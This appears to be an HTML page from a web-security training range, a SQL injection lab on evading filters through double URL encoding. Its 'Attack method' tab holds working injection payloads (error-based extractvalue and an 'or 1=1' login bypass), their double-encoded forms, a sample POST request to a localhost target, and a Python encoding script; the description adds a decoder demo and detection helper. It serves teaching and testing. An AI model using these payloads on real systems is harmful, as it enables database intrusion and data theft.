<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title></title>
    <meta name="renderer" content="webkit">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <meta name="viewport"
          content="width=device-width,user-scalable=yes, minimum-scale=0.4, initial-scale=0.8,target-densitydpi=low-dpi"/>
    <link rel="shortcut icon" href="/favicon.ico" type="image/x-icon"/>
    <link rel="stylesheet" href="../../statics/xadmin/css/font.css">
    <link rel="stylesheet" href="../../statics/xadmin/css/xadmin.css">
    <link rel="stylesheet" href="../../statics/ceber/css/mardown-css-jwsky.css">
    <link rel="stylesheet" href="../../statics/ceber/css/highlight/arduino-light.css">
    <script type="text/javascript" src="../../statics/xadmin/js/jquery.min.js"></script>
    <script src="../../statics/xadmin/lib/layui/layui.js" charset="utf-8"></script>
    <script src="../../statics/ceber/js/showdown.min.js" charset="utf-8"></script>
    <script src="../../statics/ceber/js/ceber.js" charset="utf-8"></script>
    <script src="../../statics/ceber/js/highlight.pack.js" charset="utf-8"></script>
    <style>
        .layui-tab-content {
            padding: 0px;
            padding-top: 10px;
        }

        input {
            margin-bottom: 10px;
        }
    </style>
</head>
<body>
<div class="x-body layui-anim layui-anim-up">
    <blockquote class="layui-elem-quote">URL encoding bypass</blockquote>
    <fieldset class="layui-elem-field">
        <legend>Challenge area</legend>
        <div class="layui-field-box">
            <div class="layui-row" style="vertical-align:bottom">
                <form class="layui-form" method="POST" name="form"
                      action="/ceber-range/sqli/sql23">
                    <input type="text" name="account" placeholder="Enter username" autocomplete="off" class="layui-input">
                    <button type="button" class="layui-btn layui-btn-mini" onclick="ceberSubmit(this);">Query</button>
                </form>
            </div>
            <div class="layui-row" id="rs-message">
            </div>
            <div class="layui-row" id="rs-body">
            </div>
            <div class="layui-row" id="rs-hit">
            </div>
            <div class="layui-row" id="rs-bak">
            </div>
        </div>
    </fieldset>
    <fieldset class="layui-elem-field">
        <legend>Solution area</legend>
        <div class="layui-tab layui-field-box">
            <ul class="layui-tab-title">
                <li class="layui-this">Description</li>
                <li>Hint</li>
                <li>Source code</li>
                <li>Attack method</li>
                <li>Defense</li>
            </ul>
            <div class="layui-tab-content">
                <div class="layui-tab-item layui-show" id="mubiao">Description</div>
                <div class="layui-tab-item" id="tishi">Hint</div>
                <div class="layui-tab-item" id="yuandaima">Source code</div>
                <div class="layui-tab-item" id="gongjifangfa">Attack method</div>
                <div class="layui-tab-item" id="fangyu">Defense</div>
            </div>
        </div>
    </fieldset>

    <code id="mubiao_source" style="display:none">
        <script type='text/html' style='display:block'>
            Perform the injection and retrieve the information of all users.

            Say you want to send a backslash: encoded once, it is %5c.

            But the attacker worries that this will be recognised, so they double-encode it: the % itself is encoded as %25, which joined with the rest gives %255c.

            If the URL decoder is flawed and simply keeps repeating the step "parse again from the beginning", it first turns this back into %5c and then into a backslash, i.e. it decodes in a loop. That is wrong, of course: the correct behaviour is a single decoding step that yields %5c.

            URL decoding must be done correctly.
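            The following is a worked example added to this description (it is not the lab's own code). It contrasts a decoder that decodes exactly once with the looping decoder described above, using the lab's double-encoded `admin' or 1=1 #` input; `decode_and_flag` is an assumed helper name showing how a server can spot escapes left over after a single pass.

```python
import re
from typing import Tuple
from urllib.parse import unquote

# Constructed inputs for the demo: the lab's double-encoded "admin' or 1=1 #"
# and the double-encoded backslash (0x5c) that the description talks about.
DOUBLE_ENCODED_ACCOUNT = "%2561%2564%256D%2569%256E%2527%2520%256F%2572%2520%2531%253D%2531%2520%2523"
DOUBLE_ENCODED_BACKSLASH = "%255c"

PCT_ESCAPE = re.compile(r"%[0-9A-Fa-f]{2}")


def decode_once(value: str) -> str:
    """Correct behaviour: exactly one percent-decoding pass.

    "%255c" becomes the three-character string "%5c" and stops there; the
    application then sees a literal percent sign, not a backslash."""
    return unquote(value)


def decode_looping(value: str, max_rounds: int = 8) -> str:
    """The defective decoder the lab describes: it restarts decoding from the
    front until nothing changes, so "%255c" -> "%5c" -> "\\" and the
    double-encoded input is turned back into raw SQL."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def decode_and_flag(value: str) -> Tuple[str, bool]:
    """Defender's variant (assumed helper): decode once, then flag input that
    still carries %XX escapes. A legitimate client encodes once, so a leftover
    escape after one pass is a strong signal of deliberate double encoding."""
    decoded = decode_once(value)
    return decoded, PCT_ESCAPE.search(decoded) is not None
```

After one correct pass the account value still contains no quote character, so the injected condition never reaches the query; only the looping decoder produces `admin' or 1=1 #`.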
        </script>
    </code>

    <code id="tishi_source" style="display:none">
        <script type='text/html' style='display:block'>


        </script>
    </code>

    <code id="yuandaima_source" style="display:none">
        <script type='text/html' style='display:block'>


        </script>
    </code>

    <code id="gongjifangfa_source" style="display:none">
        <script type='text/html' style='display:block'>
```
' and extractvalue(1, concat(0x5c,version())) #

%2527%2520%2561%256E%2564%2520%2565%2578%2574%2572%2561%2563%2574%2576%2561%256C%2575%2565%2528%2531%252C%2520%2563%256F%256E%2563%2561%2574%2528%2530%2578%2535%2563%252C%2576%2565%2572%2573%2569%256F%256E%2528%2529%2529%2529%2520%2523

admin' or 1=1 #

%2561%2564%256D%2569%256E%2527%2520%256F%2572%2520%2531%253D%2531%2520%2523

```


```
POST /ceber-range/sqli/sql23 HTTP/1.1
Host: 127.0.0.1:8081
Content-Length: 243
Accept: */*
Origin: http://127.0.0.1:8081
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://127.0.0.1:8081/ceber-range/sqli/23.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7
Connection: close

account=%2527%2520%2561%256E%2564%2520%2565%2578%2574%2572%2561%2563%2574%2576%2561%256C%2575%2565%2528%2531%252C%2520%2563%256F%256E%2563%2561%2574%2528%2530%2578%2535%2563%252C%2576%2565%2572%2573%2569%256F%256E%2528%2529%2529%2529%2520%2523
```


```
import string

payload = "' and extractvalue(1, concat(0x5c,version())) #"
retVal = payload

if payload:
    retVal = ""
    i = 0

    while i < len(payload):
        # An existing %XX escape is kept and only its % is re-encoded -> %25XX
        if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits:
            retVal += '%%25%s' % payload[i + 1:i + 3]
            i += 3
        else:
            # Every other character is encoded twice: char -> %XX -> %25XX
            retVal += '%%25%.2X' % ord(payload[i])
            i += 1

print(retVal)
```
        </script>
    </code>

    <code id="fangyu_source" style="display:none">
        <script type='text/html' style='display:block'>


        </script>
    </code>
    <blockquote class="layui-elem-quote layui-quote-nm">Continuous integration</blockquote>
</div>
</body>

<script>
            $(function () {
                // load the popup layer
                layui.use(['form', 'element'],
                    function () {
                        layer = layui.layer;
                        element = layui.element;
                    });
                var converter = new showdown.Converter();
                $("#mubiao").html(converter.makeHtml($("#mubiao_source").html().substr(48)));
                $("#tishi").html(converter.makeHtml($("#tishi_source").html().substr(48)));
                $("#yuandaima").html(converter.makeHtml($("#yuandaima_source").html().substr(48)));
                $("#gongjifangfa").html(converter.makeHtml($("#gongjifangfa_source").html().substr(48)));
                $("#fangyu").html(converter.makeHtml($("#fangyu_source").html().substr(48)));
            });

        $(document).ready(function () {
            $('pre code').each(function (i, block) {
                hljs.highlightBlock(block);
            });
        });
        </script>
</html>